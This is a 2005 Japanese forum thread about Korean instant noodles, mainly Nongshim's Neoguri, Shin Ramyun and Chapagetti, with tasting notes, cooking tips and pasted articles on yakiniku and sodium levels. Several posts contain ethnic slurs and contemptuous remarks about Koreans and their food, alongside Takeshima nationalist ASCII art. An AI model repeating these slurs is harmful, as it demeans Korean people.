http://store.yahoo.co.jp/kochujang/b4dab9f1a59.html

139 : ◆koreaIIBwU :05/03/12 08:54:33 ID:XG+TYY1H
ああ、今はime.stが落ちているから、通常のブラウザで見るときはアドレス欄にコピペ。

140 :すぐ名無し、すごく名無し:05/03/12 09:31:50 ID:y/w1rsAn
表紙はキムチがたくさんのっかってそうだが
これは農心なのかな

141 :すぐ名無し、すごく名無し:05/03/14 08:51:54 ID:ZbTAyh+H
テールスープラーメン喰った。
正式にはなんというかしらない。
ソルロンタン風にカルビ肉と春雨、
コショウを多めに入れてくったらうまかった。
このスープの場合はあまり具をいろいろ入れないほうがいい。

142 : ◆koreaIIBwU :05/03/14 10:10:34 ID:pqG15E71
>>140
農心
キムチブロックがついていると良かったんだけど。



今日はノグリを食べたよ。
わかめの味がきいていて、あまり辛くはないね。そして麺が太い。

143 :すぐ名無し、すごく名無し:05/03/14 11:36:30 ID:s4oEZpLG
このエサは在日チョンの昼飯ですか。

144 :すぐ名無し、すごく名無し:05/03/16 08:43:51 ID:fD8sv/RQ
>>130
最新ロットは、韓国製造で日本農心輸入販売の日本語表記付きになってるもよう。
チャパケティは麺のコシが全然違った。
ノグリは違いはわからん。

145 :すぐ名無し、すごく名無し:05/03/18 10:33:29 ID:EAsfn6Zj
昔は農心(ノグリ)うどんと呼んでた希ガス...ry

146 :すぐ名無し、すごく名無し:05/03/18 12:45:12 ID:IrNW7508
ノグリ箱で購入したぜ
なにいれればうまいかな

147 :すぐ名無し、すごく名無し:05/03/18 14:23:07 ID:/4VGMiMG


148 : ◆koreaIIBwU :05/03/18 15:49:07 ID:DqPh2xx0
>>146
ノグリ(たぬき)にちなんで揚げ玉。

149 :すぐ名無し、すごく名無し:05/03/19 03:06:59 ID:9bOH4cOo
>>146
とき卵との相性の良さは涙もの。
基本的にノグリはいろいろ入れない方が漏れはいいと思う。
最近はあえてデフォルトで食ってる。

150 :コソボくん:05/03/19 17:56:36 ID:PEmZdo6H
>>145
それ覚えてる。

151 :すぐ名無し、すごく名無し:05/03/19 19:42:02 ID:zkgeqStT
食べ過ぎるとファビョッたりしませんか?


152 : ◆koreaIIBwU :05/03/20 14:11:50 ID:xBFZnOSj
じゃがいも麺ウマー

153 :すぐ名無し、すごく名無し:05/03/20 18:14:01 ID:m6lEJd0/


                        \ │ /
             (  ヽ        / ̄\   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     , ⌒ヽ    (     )     ─( ゚ ∀ ゚ )< たけしまたけしま!
    (    '   (       ヽ⌒ヽ  \_/   \_________
    ゝ    `ヽ(             / │ \ (⌒ 、
   (           、⌒         ヽ     (     ヽ
  (    (⌒                  )   (
___________________________________

                  ____
                  | ● |             ____
                  _| ̄ ̄"  ..          | ● |
 ̄ ̄ ̄ ̄ ̄\        /!\               | ̄ ̄"
タケシマタケシマ!.> _   __/-- ::!\        ./\_/"r---、
_____/ ./ !、__/  ヽ  ヽ \      /ヽ  / /ヽ  ヾi___    / ̄ ̄ ̄ ̄ ̄ ̄
         ,/  i_.: ヽ  \゚∀゚..:!  \  ....../;;;;;i .\.!. !:::: ゚∀゚ ." ヽヽ <日本の領土〜〜!!!
        /   /::    :::  /:::: :::::i.:::::::'''''\|_/  /i      __ヽ \______
::::::......    /    /   /::::::::i./  ::  .\.:::::::::'''  丶 ̄ヽ───""".::::................
       / :::i    _::::::::::::::::/       \
  ::::::::::::::::: ̄ヽ__  /丶--、___−--! ̄""
   ''':::::::::::::::::::::::::::'''''''''''''''...................
                  ...::::::::::::::::::'''''


154 :すぐ名無し、すごく名無し:2005/03/25(金) 14:07:01 ID:vvNLJi9w
商品によって麺が全く違う。
麺にこだわりあるな

155 :すぐ名無し、すごく名無し:2005/03/29(火) 15:51:59 ID:mp3L02PD
ユッケジャンラーメンうまいね。
これはファミマで買ったよ。最近出たのかな?

韓国の政治は嫌いだが、
韓国の食文化はすばらしい!

156 :すぐ名無し、すごく名無し:2005/03/30(水) 15:39:07 ID:tKFBX2yg
ジャガイモ麺超うまい。冷麺みたいな食感でニンニク効いたスープ。最高

157 :すぐ名無し、すごく名無し:2005/03/30(水) 16:52:39 ID:0O27DuHD
しまった、熱ラーメンのことはこっちに書くべきだったか。

158 :すぐ名無し、すごく名無し:2005/04/10(日) 10:05:12 ID:9axXThv9
>>58
亀レスに板違いだが、何度読んでもいい話だな。

159 :すぐ名無し、すごく名無し:2005/04/13(水) 16:40:45 ID:9nK1165f
チョンのカップ麺なんかを好きなヤツが本当にいるんだな。
そんなもん食って気持ち悪く無いか?身体は大丈夫か?

160 :すぐ名無し、すごく名無し:2005/04/13(水) 16:53:15 ID:VnTdf+GW
>>159
オレはおまいさんの国際感覚の欠如っぷりのほうが心配だ

161 :すぐ名無し、すごく名無し:2005/04/14(木) 02:14:22 ID:fKUgoAVz
ひさびさにあがってますな。
上で挙げられてるジャガイモ麺って正式名称なんなんだろ。
名前がわからないと検索できないよパピー。

162 : ◆koreaIIBwU :2005/04/14(木) 05:02:52 ID:LEDlo6VE
>>161
ガムジャメンとかカムジャメンで。

163 :すぐ名無し、すごく名無し:2005/04/14(木) 05:05:35 ID:QiroAvQT
ついにあびる優が脱いだみたいです
とうとう落ちるとこまで落ちたね・・・
結構好きだったのになー・・・
http://messages.yahoo.co.jp/bbs?.mm=GN&action=m&board=2000165&tid=bcam3hfebbr&sid=2000165&mid=1&type=date&first=1

164 :すぐ名無し、すごく名無し:2005/04/14(木) 05:52:37 ID:7rw4fNXV
おお、あがってるね。
夜食にコムタン(カップ)食べました。
辛ラーメンスレの方には書きづらいから…と悩んでたらタイミング良過ぎ。
コムタン(`Д´)ウマー!!!

165 :すぐ名無し、すごく名無し:2005/04/14(木) 19:44:00 ID:5SKJ2CU6
コムタン<`Д´>ウマー!!!

166 :すぐ名無し、すごく名無し:2005/04/14(木) 20:03:34 ID:7rw4fNXV
ノグリ夕ご飯に頂きました。たまねぎ、卵だけでシンプルに。
後で夜食にはコムタンのカップを食べようと思ってます。
農心ばっか食べ過ぎか…

167 :すぐ名無し、すごく名無し:2005/04/15(金) 20:25:02 ID:62EO3akS
サリゴムタン麺の存在を思い出したので食ってみた。
ズルズルズル・・・。日本のラーメンと変わらん・・・・。
マズくは無いが辛ラーメン程の個性は無い。


168 :すぐ名無し、すごく名無し:2005/04/18(月) 05:15:17 ID:y3dOrKmM
http://www.rakuten.co.jp/nk/461897/462061/ [ソースチェック]
有名店で使用されている朝鮮風醤油ベースの焼肉のタレです。
http://www.suzukatsu.co.jp/delica.html [ソースチェック]
漬け込んでも、焼いてからつけても美味しくお召し上がりいただけます。
http://www.suzukatsu.co.jp/company.html [ソースチェック]
本場の朝鮮風の味付けで、お肉の味を引き立てます。

日本人の牛肉摂取量は、一九六〇年には一人当たり年間一・一キロだった。
それが八〇年には三・五キロになり、九〇年には六・一キロに達した。
ステーキ、ハンバーガーなどの一般化もあるだろうが、
刺身やスキヤキの ように「薄くきった肉をタレに浸して箸で食べる」という、
日本の食習慣 に極めて近い焼肉の浸透が、
日本人の「肉食道」拡大にかなり影響してい るであろうことは、想像に難くない。

六〇年代、焼肉は高度成長に合わせて徐々に日本社会に浸透した。
当時は まだ牛肉が高値で、家庭の食卓では豚肉が主流だった。

そこで、食品会社 が豚肉になじむ「朝鮮風焼き肉のたれ」を発売。
七〇年代には牛肉用も好 評になり、焼肉は一般家庭にも広く受け入れられていく。

焼肉のファン層を広げたと言う点では、無煙ロースターの存在も見逃せな い。
モウモウたる煙を気にせず女性でも気軽に焼肉店に入れるようになり
デート、接待にと用途も広がった。 この無煙ロースターが売り出されたのは、八〇年三月。
開発した「シンポ」 (本社=名古屋市)は、
これまでに十万台以上を販売しており、全国シェア の約半分を占める。
七一年に社員三人から始めた同社が、今や年商三十三億 円、
社員約百人を抱えるということからも、焼肉が掘り起こした日本社会の
「肉食道パワー」が、どれほど大きいものであるかがうかがえる。

そして、ソウル五輪(八八年)時のコリア・ブームを経て、九〇年代。
洗練 された新興焼肉企業群の怒涛のごときチェーン展開が、
この業界に地殻変動 を起こしている。
首都圏五百店戦略の「安楽亭」、中部の覇者「焼肉屋さか い」、増殖ぶりが際立つ「牛角」などが主人公だ。
数百店舗というスケール メリットをフルに生かした、
これら企業の攻勢により、価格競争はすでに、 カルビ一人前参百円レベルになっている。

そのあおりを食っているのが、旧来からの焼肉店だ。
出口の見えない不況と もあいまって、競争に敗れ、廃業を余儀なくされる例も少なくない。
そんな中でも、ただ戦々恐々として毎日を過ごしている経営者ばかりではない。
「コリア色」を徹底して薄め、 焼肉のファミレス化・居酒屋化で顧客開拓を 目論む大手の戦略を逆手にとり、
「民族」へと回帰するコリアンの若手経営 者らが、徐々にだが頭角を現している。

焼肉業は長きにわたり、多くのコリアンにとって、所詮は生業に過ぎなかった。
しかし、この「安住の領域」が大手の攻勢という風雨に洗われて初めて、
肉 食道を究めようとの志が芽をふいている。 肉食道の量的拡大は、ひとまず区切りをつけた。 宣言しよう。
在日コリアンは近い将来、「焼肉誕生」に続く大きな贈り物を 日本の肉食道にもたらす。
熾烈な出店・生き残り競争は、その序章でしかな いかもしれない。


169 :すぐ名無し、すごく名無し:2005/04/18(月) 07:13:03 ID:y3dOrKmM
鈴勝は優良企業だよ。経営者も立派な方だしね。
平成6年4月 中国広東省「潮州金蔓醤油有限公司」合弁設立に参画。
平成7年2月 中国北京市「北京鈴和摩奇食品調味料有限公司」合作設立に参画。
平成10年2月 中国吉林省延吉市「延吉亀万食品有限公司」合弁設立に参画。
http://www.rakuten.co.jp/nk/461897/462061/ [ソースチェック] 有名店で使用されている朝鮮風醤油ベースの焼肉のタレです。
http://www.suzukatsu.co.jp/delica.html [ソースチェック] 漬け込んでも、焼いてからつけても美味しくお召し上がりいただけます。
http://www.suzukatsu.co.jp/company.html [ソースチェック] 本場の朝鮮風の味付けで、お肉の味を引き立てます。


170 :すぐ名無し、すごく名無し:2005/04/18(月) 12:48:39 ID:QJtQEvY3
ちゃぱけてぃ って何?
おこげがタレなの?
癌にならないかな

171 :すぐ名無し、すごく名無し:2005/04/26(火) 20:24:56 ID:ACgTrpIH
生ゴミをドライにしてそうだ。こんなもん輸入中止にせよ。
韓国の食べ物はまったく信用に値しない。

172 :すぐ名無し、すごく名無し:2005/05/01(日) 04:18:17 ID:XDzrLpRe
麺100gってのが気に入ってる>辛

173 :すぐ名無し、すごく名無し:2005/05/02(月) 18:52:48 ID:gnVXLtRV
国産インスタントラーメンは気持ち悪くなるのに、
ノグリウドンはならない、どーしてかなぁ。
外出しない日に30年近く食べてるけど、好きだ。


174 :すぐ名無し、すごく名無し:2005/05/03(火) 01:23:32 ID:za4Tr+YU
>>170
名前からして多分、韓国で生まれた中華料理、
「チャジャン麺」のソースをまんまスパゲティに応用したものでは?
同じケースでチャジャン飯てのもあるし。
もしそうならおいしいと思われます。
チャジャンソースはめちゃうまいから。お子げではないです。

175 :オリーブ香る名無しさん:2005/05/03(火) 10:39:41 ID:OfsfT/WN
チャパ下手あんまうまくない

176 :すぐ名無し、すごく名無し:2005/05/03(火) 16:02:55 ID:Q2vJEH7P
日本には世界に誇れる憲法第9条がある。
さらに、日本には軍隊というものは存在しない。
自衛隊はどうなるニダー!と隣の国のヴォケ共がファビョっているが、
よく考えてみて欲しい。自衛隊が他国で鉄砲1発でも撃ったのか?
もし日本が軍隊を持つ国家であったなら、竹島問題はたちまち紛争化して
しまうのではなかろうか。そう考えると、彼等の主張する
靖国参拝問題が軍国賛美などということが、いかに的外れか。ということだ。
とりあえず竹島は日本国固有の領土だから返せ。
また、不法占拠している現状において、水産資源の乱獲は直ちに中止せよ。



177 : ◆koreaIIBwU :2005/05/03(火) 22:36:21 ID:RjyPs4jc
>>174
韓国で生まれたというか、韓国で変化した中華(四川)料理と言うべきだな。
元は日本でもおなじみのジャージャー麺。
韓国で辛い料理が甘い料理に変化したというのが面白い。

178 :すぐ名無し、すごく名無し:2005/05/04(水) 00:54:29 ID:jBsYFflx
さて、日付が変わって
今日のK−1が楽しみだ
仏・チビンちゃんは魔裟斗を相手に何Rまで立っていられるかなぁ
秒殺?ありうるかもなあ


179 :すぐ名無し、すごく名無し:2005/05/04(水) 23:33:13 ID:Hf3qLhJy
カラスや椋鳥もそっぽ向く韓国の食い物。人間も食べてはいけないという
自然からのお告げです。

180 :すぐ名無し、すごく名無し:2005/05/05(木) 00:31:33 ID:zKGXG3pm
朝鮮人がバクバク食っているみたいだよ。


181 :すぐ名無し、すごく名無し:2005/05/10(火) 11:24:13 ID:t5ddZ7AB
安城湯麺食ってみた。麺は4〜5分茹でと書いてあるけど
辛ラーメンより若干細いのか(?)4分でもちょいやわらかめになったのでもっと短くてもいいかも。

スープの辛さは辛ラーメンより抑えてある。
スープ自体の味も辛ラーメンに比べてかなりあっさりしている印象を受けた。

上の方のレスのジャガイモ麺気になるなぁ〜
近所のジャスコには売ってなかった。
まぁ漏れ大阪だからいくトコ行けばGETできるだろうけどw

182 :すぐ名無し、すごく名無し:2005/05/10(火) 16:26:10 ID:0gtXA3mp
今、とあるディスカウントスーパーのチラシで
農心キムチゲラーメンカップが69円なんだけど、これって安い方なの?(メーカー価格は155円)
辛ラーカップしか食べた事ないから、味はどう違うのか…

183 :すぐ名無し、すごく名無し:2005/05/10(火) 21:42:59 ID:pXrcpiKb
>>170
亀スマソ。チャパゲッティ好きだ!
見た目は真っ黒で凄いけど、味はマイルド。
甘いっつー訳でもなくうまく表現できない。しょっぱくもないし。
麺は袋辛ラーメンに似た、太めで独特のこしのある麺。
乾燥ミックスベジタブルが少々入ってる。

新宿でチャヂャンミョン食べて、家で再現しようとしたけど
なかなか難しかった。レシピ知らなくて甜面醤を使ったら甘くなるし。

チャパの方は勿論店で食べるのとも違って、独特のジャンクさがある。
けど、また食べたくなる不思議な魅力がある。





184 :すぐ名無し、すごく名無し:2005/05/11(水) 17:04:26 ID:WEEYi/OK
>>183
おお、チャジャンミョン好きがここにも!
ナカーマ(´∀`)人(´∀`)ノシ


185 :あぼーん:あぼーん
あぼーん

186 :あぼーん:あぼーん
あぼーん

187 :すぐ名無し、すごく名無し:2005/05/11(水) 20:17:35 ID:vj0Z5A5y
>>184
辛ラーメンしか食べてないけど、それも辛いですの?
ドライブインでそれっぽいの売っていたんだけど荷物になるから
買わなかった。今になって後悔。

188 :184:2005/05/11(水) 21:07:12 ID:WEEYi/OK
>>187
辛くないですよ。
中華系の真っ黒ソースで塩辛くも無くほんのり甘い感じ。
美味しいですよ。一度どうぞ。

189 : ◆koreaIIBwU :2005/05/11(水) 23:59:03 ID:+GK/YTQW
四川チャジャン麺の方は、オリーブ油の代わりにラー油が入っているから少し辛い。
ちょっと高いけれど、こっちの方が好き。

190 :すぐ名無し、すごく名無し:2005/05/12(木) 03:45:15 ID:nfcQVbqe
「チャジャン」麺か。
一瞬「チャンジャ」麺かと思った。
タラの塩辛が入ってるのかと思った。
チャジャンてどういう意味だろ。
>>182
少し酸味があってまとまった味わいだとおもう。
そのままで食べるなら辛ラーメンより好きという人も多いかもしれない。
値段だけど定価は量にくらべて高すぎ。逆に69円だったら安いと思われ。

191 :すぐ名無し、すごく名無し:2005/05/13(金) 13:46:41 ID:DdO6wjR3
食品に限らず、韓国製品をわざわざ銭出して買うこと自体が
ムダの極地。

192 :すぐ名無し、すごく名無し:2005/05/13(金) 18:30:09 ID:RV4bCQpU
>>191
おいしいよ。 (@゜▽゜@) ノ

193 :すぐ名無し、すごく名無し:2005/05/13(金) 21:42:48 ID:jt5UBNo1
インスタント(?)の冷麺をかったゾ。
白い紙袋にはいってるやつ。生のキムチが真空パックで同封されていて
なんだか本格的だ。明日の朝食がたのしみだ。

194 :すぐ名無し、すごく名無し:2005/05/16(月) 08:54:03 ID:oV2wptI/
俺も冷麺好きなんだけど>193の食後の感想レスはまぁだ?
モノホンの冷麺と比べてどうよ?

195 :すぐ名無し、すごく名無し:2005/05/16(月) 18:39:40 ID:ipY5gVJi
>>194
すんません
材料のキュウリを切らしていたことに気づいて
明日の朝まで引き伸ばし・・・(´・ω・`)

196 :すぐ名無し、すごく名無し:2005/05/17(火) 20:06:13 ID:4AyNzwEJ
食べたよー。
細麺の冷麺でかなりウマかったよ。でも湯にさらして水で冷やして別皿の
スープにうつす手順だからインスタントとは違ったかなぁ。
味や食感は本格っぽかったです。個人的には付属のキムチの酸味具合が
よかったでつ。

197 :すぐ名無し、すごく名無し:2005/05/20(金) 03:40:12 ID:Ox2NFfYf
 韓国内で市販中のインスタントラーメンは、ナトリウム(Na)の含量国際基準
値を大きく上回っていることが、調査により分かった。

ソウル環境連合が19日伝えたところによると、この3年間「韓国内販売トップ
10」に入ったインスタントラーメン11製品のうち、8製品が世界保健機関
(WHO)が定めた成人の1日当たりナトリウム摂取基準値(1968ミリ
グラム)を上回った。最多のナトリウムが検出された製品は「ワントゥコン」
(韓国ヤクルト)で、麺に610ミリグラム 、スープに2110ミリグラムで、
WHOの基準値より1.4倍ほど多かった。

11製品の平均ナトリウム含量も2075ミリグラムにのぼり、WHOの基準値
を超過した。保健福祉部(福祉部)によると、韓国成人の1日当たりナトリウム
摂取量は、平均4903ミリグラムであり、食品医薬品安全庁が定めた1日ナト
リウム摂取基準値は3500ミリグラムだ。これは、英国(1600ミリグラム)
と米国(1500ミリグラム)の基準より高いもので、テンジャンチゲ(味噌鍋)
やキムチ汁(1人前)のナトリウム含量より2〜3倍ほど多い。

専門医のイ・スンナム氏は「ナトリウムの過多摂取で、健康を阻害する恐れが
ある」とし「韓国内のナトリウム摂取基準量を国際レベルに下げる必要がある」
と話した。
学界では、1日に500ミリグラムならば健康に問題がない、としている。
各メーカは「ラーメンの過剰摂取で健康が悪くなる、との見方は行き過ぎた拡大
解釈」だと反論した。ラーメン大手「農心(ノンシム)」側は「韓国人は塩辛い
味が好き。そうした味覚に基づいて製造している」とし「WHOの基準は、
西洋の献立に基づいたもの」と伝えた。

http://japanese.joins.com/article/article.php?aid=63677&servcode=400§code=400
やっぱりチョン国製インスタント食品なんか食すのはデンジャラス。


198 :すぐ名無し、すごく名無し:2005/05/20(金) 08:40:05 ID:E65RIkJ6
>>196
調理行程や真空パックキムチなどから察してほんと本格ぽいですね。
味と食感がぽかったら全然問題ないじゃん。一度食べてみたい。
俺は見たことないんだけど結構出回ってるのかな。

199 :すぐ名無し、すごく名無し:2005/05/20(金) 09:11:06 ID:BckRM1j3
ナトリウムを減らして塩味を出すことなんかしねーだろーなあ。

200 :すぐ名無し、すごく名無し:2005/05/20(金) 17:01:48 ID:z8agG6Wo
>>198
どうやら農心ではないようで(←じゃスレ違いじゃねーか)東亜トレーディングと
かいてありました。白い袋に黒い文字だったと思うので参考にしてね。

201 :すぐ名無し、すごく名無し:2005/05/20(金) 22:21:15 ID:dZzlQi4G
朝鮮の人にはナトリウムが含まれているので、不用意に水をかけると爆発します。
そうゆうことを婉曲表現したのですね。>>197

202 :すぐ名無し、すごく名無し:2005/05/26(木) 17:08:19 ID:VzOD4l/5
辛ラーメンが韓国ラーメンオッケーになってしまったから
ここのカキコ量が減ってしまったな、、

元からあっちのほうがカキコ多かったけど

203 :すぐ名無し、すごく名無し:2005/05/27(金) 16:01:40 ID:U5FlnUBV
ノグリ好きな人少ないのかな?
私は辛ラーメンより好きなんだけど・・でも値段が高い。

204 :すぐ名無し、すごく名無し:2005/05/27(金) 20:16:54 ID:VT4FUbgx
韓国のカップ麺なんて生ゴミがドライになってそう。

205 :すぐ名無し、すごく名無し:2005/05/27(金) 20:32:06 ID:9Jgb6MVz
>>203
値段よりも出回りが悪いことのほうが問題だな。

206 :すぐ名無し、すごく名無し:2005/05/27(金) 20:51:13 ID:ItlbprVP
>>203
私も実はノグリのほうが好き。
でもなんだかみんなノグリの話題に乗ってくれないねー。
アレンジしにくいから話題性にかけるってのも理由にあがるんでしょうね?
デフォルトでもかなりいけちゃうのが罪か…。な。

207 :すぐ名無し、すごく名無し:2005/05/27(金) 20:54:49 ID:+7q3Bae6
http://www.rakuten.co.jp/eprice/565017/602185/602190/
http://www.rakuten.co.jp/eprice/565017/602185/604869/
↑この2種を食べた事ある人います?
ちょっと興味があるので、注文してみようと思ってるのですが。
1つ目のジャジャンボンボクって、目茶目茶辛そうに見えるの
ですが、もしかして汁なしなんでしょうか?

208 : ◆koreaIIBwU :2005/05/27(金) 23:59:47 ID:ktb0+CoT
>>207
上は多分汁無しで全然辛くないよ。
下はいかチャンポンだと思うから、ちょっと辛いと思う。

209 :すぐ名無し、すごく名無し:2005/05/29(日) 23:19:58 ID:KcxRYI7R
>>207
なんか最近ハングル文字見るだけで辛くなって唾がでてくる。
パブロフの俺様。

210 :すぐ名無し、すごく名無し:2005/05/30(月) 20:17:06 ID:uoFVBOvZ
条件反射てヤシですな。パブロフの。
その境地まで到達してるあなた、
真の韓ラーファンと認定します。

211 :すぐ名無し、すごく名無し:2005/05/30(月) 23:42:10 ID:E+Pl+h21
ハングル+赤だと確実に辛いラーメンスープを連想するようになった

212 :すぐ名無し、すごく名無し:2005/05/31(火) 00:36:01 ID:cj/ckMpe
下等民族が作るインスタントを平気で食す日本人がいるとは・・・
きちんと健康診断毎年やってんの?

213 :すぐ名無し、すごく名無し:2005/05/31(火) 13:00:11 ID:J7rlQ9v/
いや、この人達日本人じゃないから


214 :すぐ名無し、すごく名無し:2005/05/31(火) 16:50:14 ID:4m0n8bBy
>>206
単に知名度の問題と思われ。
ノグリ自体ここで初めて知ったし、店頭でお目にかかったことないし。

215 :すぐ名無し、すごく名無し:2005/05/31(火) 19:14:08 ID:N6VnwTvI
袋を開けたら朝鮮人が入っていた。びっくりしたよ。もう。


216 :すぐ名無し、すごく名無し:2005/05/31(火) 21:53:59 ID:NRwFUvNz
>>214
そうかもね。
けっこう美味しいんだよね。
昔はノグリうどんと言う呼び名だった。
自分はNY在住の時に知った。
もっと知名度が上がればいいな。

217 :あぼーん:あぼーん
あぼーん

218 :すぐ名無し、すごく名無し:2005/06/01(水) 09:36:10 ID:bOY753eM
>216
ノグリうどん」の呼称を知っているとは、あなた30代ですね?
わたしもですがw

219 :すぐ名無し、すごく名無し:2005/06/01(水) 22:43:00 ID:dC+uO2Ch
辛スレで通販のHPが紹介されてたので、ちょっくらノグリデビューしてみるね。

220 :すぐ名無し、すごく名無し:2005/06/02(木) 01:03:48 ID:VxG/gjGD
>>218
ま、お互い同じような世代ですな(w

221 :すぐ名無し、すごく名無し:2005/06/02(木) 12:03:53 ID:FIZx6/Qq
チゲラーメンって卵とじだけで食べると
独特の薬品臭さ故に不味くて処分に困ってたんだが
今日は干昆布から煮出して大根とソーセージ、卵とじで食べてみた。
美味ーい!!
辛ラーメンと違って具沢山で食べたほうが薬品臭さが消えて美味かった。

222 :あぼーん:あぼーん
あぼーん

223 :すぐ名無し、すごく名無し:2005/06/02(木) 19:54:23 ID:rX4anjNK
>>222
まあここでこんなクソカップ麺をうまいとか言ってる脳と味覚が
おかしいやつらに何言っても、韓国の悪行は理解されないん
だろうな。

224 :すぐ名無し、すごく名無し:2005/06/03(金) 05:33:11 ID:R0rJl+nl
>>221
なんか他のと比べると駄目そうね(´・ω・`)
カップのキムチチゲラーメンは悪くなかったんだが。
無難にノグリを買っとくか。

225 :すぐ名無し、すごく名無し:2005/06/03(金) 08:01:49 ID:nMiAjlHX
ノグリ、カルディーで3個買ってきた。
キムチと一緒に食べるとウマ〜

226 :すぐ名無し、すごく名無し:2005/06/03(金) 11:08:12 ID:9dh+Q6/D
チゲラーメンなのかな……。オレンジのパッケージで
物凄く薄い小さいソーセージとトックとキムチの
断片が2〜3個入ってた。
まあ、うまかったがダシの匂いがきついな。
朝までこもってたよ。換気扇使ったのに。

227 :224:2005/06/04(土) 15:39:11 ID:6xWmvaCn
>>226
ソーセージやトックも入ってるのか・・
その点はなんか惹かれるぞ

228 :♯でらえもん調査局:2005/06/04(土) 21:53:41 ID:AG60wMay
辛ラーメンのオールハングル版、旨いけど滅茶苦茶辛い。
親子丼と食べたら口が熱くてとても食べられなかった。

229 :すぐ名無し、すごく名無し:2005/06/06(月) 19:54:05 ID:nmMaiHf8
解決への道は遠いようです
http://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_12/56000/55242.jpg


230 :すぐ名無し、すごく名無し:2005/06/09(木) 00:27:20 ID:4WByNEg7
>>228
そんなあなたにはとき卵をお奨めします。
チーズもいけますよ。
マイルドに中和します。

231 :すぐ名無し、すごく名無し:2005/06/09(木) 16:09:19 ID:lXSZX6L3
生ゴミで具が作られてそうで怖い。マジで。

232 :すぐ名無し、すごく名無し:2005/06/12(日) 04:19:47 ID:dDs0AQEM
>>231
ちょっと企業秘密(朝p

233 :すぐ名無し、すごく名無し:2005/06/14(火) 00:10:02 ID:AFMzOoYt
今日、初めてノグリ買いました〜。
ずーっとここ見てて美味しそうだなぁって思っていて。
さすがに素では寂しいので、まずは一番最初に合わせておけという具材はありますか?
普段の袋麺では卵とネギはデフォルトなのでそれ以外であったら教えてください!

234 :すぐ名無し、すごく名無し:2005/06/14(火) 11:00:55 ID:vd4h7Es2
>233
金があるなら牛肉入れろ.
うまいぞ,マジで.

235 :すぐ名無し、すごく名無し:2005/06/15(水) 00:05:31 ID:+Dw0g6Ue
>>234
明日のお昼やってみます!
楽しみ〜。

236 :すぐ名無し、すごく名無し :2005/06/15(水) 17:35:42 ID:2bCCs3qG
都内で韓国食材買うとしたらど
っか安いところない?
レトルトのカルビクッパとか微妙に高い

237 :あぼーん:あぼーん
あぼーん

238 :すぐ名無し、すごく名無し:2005/06/16(木) 01:07:24 ID:cLhkqcks
233です。
今日、食べてみました!
お湯沸いたくらいに封を切ったら、昆布が1枚入っててびっくり。一瞬、不良品かと…w
元から知ってたら沸かす前に入れたのにと思いつつ、麺と一緒に入れました。
でも、すっごい美味しかったです!
234さんのアドバイス通り牛肉も入れたのですが、もうこれが即席!?ってくらいで感動。
この汁で初めてご飯を、ラーメンの汁にご飯入れたくなる人の気持ちがわかりました。
多分、もうハマってしまいました。

>>236
大久保界隈なら安いし、色々揃うとおもいますよ。

239 :すぐ名無し、すごく名無し:2005/06/16(木) 11:47:39 ID:XvAxqvaa
>>238
卵とネギはデフォルトということですが、
卵はとき卵でやったんですね?
もし後乗せだったらとき卵やってみて下さい。
美味しいです。

240 :すぐ名無し、すごく名無し:2005/06/16(木) 12:44:23 ID:E8kugz/L
みなさんも協力してください。
http://bbs.enjoykorea.naver.co.jp/jaction/read.php?id=enjoyjapan_16&nid=1440591&work=list&st=&sw=&cp=1

241 :すぐ名無し、すごく名無し:2005/06/16(木) 23:27:56 ID:cLhkqcks
>>239
再び233です。
はい、溶き卵でやりました!
美味しいですよね〜。

242 :すぐ名無し、すごく名無し:2005/06/17(金) 02:12:59 ID:23WDUK9A
感動した!
ttp://www.rakuten.co.jp/eprice/565017/585216/
 
特にイワシラーメン。

243 : ◆koreaIIBwU :2005/06/17(金) 03:30:26 ID:SRIrPkyT
http://www.rakuten.co.jp/eprice/565017/585216/608225/
これいいな。

244 :すぐ名無し、すごく名無し:2005/06/17(金) 12:30:04 ID:p5Mq9Tzz
オレの好きなのは「ノグリうどん」と「三養ラーメン」.
卵を入れる時は,ゴマ油で目玉焼きにして上にのせる.
焼き具合は卵の底が固まる程度.もちろん黄身はほぼ生.
後は安いカレー・シチュー用の牛肉をスライスしてキムチやネギ,
ニラや小松菜・漬け菜とかあれば葉物野菜を火を止める直前に投入.
スライスチーズも入れたいが卵を入れる時はやめとく.
もちろんシイタケやニンジンもいいし,肉がなければスパムやチューリップの
ポークランチョンミートや粗挽きソーセージなんか入れるとプデチゲ風でうまい.

245 :すぐ名無し、すごく名無し:2005/06/17(金) 12:51:06 ID:2r9tblYN
>>242
>>243
すげーほとんどみんな農心じゃん。
イワシカルグクスもビビンミョンもうまそうだねー。
カルグクスはジャガイモでん粉入ってるから麺がいけてそう。

>>244
読んでたら久々に色々入れて土鍋でやりたくなってきた。
ご飯よそって家族で食いたい。

246 :すぐ名無し、すごく名無し:2005/06/17(金) 22:23:59 ID:zNcxHbKx
名前がきになるムパマラーメン

247 :食いだおれさん:2005/06/17(金) 22:49:06 ID:VfMLQuhm
レトルトのトックはうまいの?

248 :すぐ名無し、すごく名無し:2005/06/18(土) 06:30:56 ID:wzE9kHEj
韓国のインスタント?うじが入っていそう。何でこんなもん好きなの???

249 :すぐ名無し、すごく名無し:2005/06/18(土) 10:04:28 ID:1QFPOb4Y
>248
まぁ、頭にウジの湧いてるお前にゃ理解不能だろな。

250 :すぐ名無し、すごく名無し:2005/06/18(土) 14:32:51 ID:ZbhSGvKv
>>242
イワシラーメン?どうイワシなんだ。
煮干しラーメンとはちがうんだろうな。ジャガイモといい
不思議な素材がけっこうあるな。

251 :すぐ名無し、すごく名無し:2005/06/18(土) 14:37:11 ID:LuBrWpvt
【2ch全板】人権擁護法案反対最高司令部★【統括】2
http://tmp5.2ch.net/test/read.cgi/asia/1118934537/

252 :すぐ名無し、すごく名無し:2005/06/18(土) 17:23:59 ID:/fvXE3NR
袋をあけたら朝鮮人が入っていた。

253 :すぐ名無し、すごく名無し:2005/06/18(土) 17:30:35 ID:ifuOoP8W
またラーメン韓国人が増殖してる。
http://bbs.enjoykorea.naver.co.jp/jaction/list.php?id=enjoyjapan_8

254 :すぐ名無し、すごく名無し:2005/06/18(土) 18:03:22 ID:/hLsVdBH
>>250
カルグクスってのはラーメンとは別物で、きしめんみたいな麺。
食ったことないけど、多分イワシの煮干しでだしをとってるんだろうと思うよ。

255 :すぐ名無し、すごく名無し:2005/06/18(土) 21:04:28 ID:1QFPOb4Y
ククス(クッス)ってのはニホンで云えば冷麦みたいな麺だね.
海鮮系の出汁(貝類とか)や鶏の出汁とかでわりとあっさりしたもんだ.
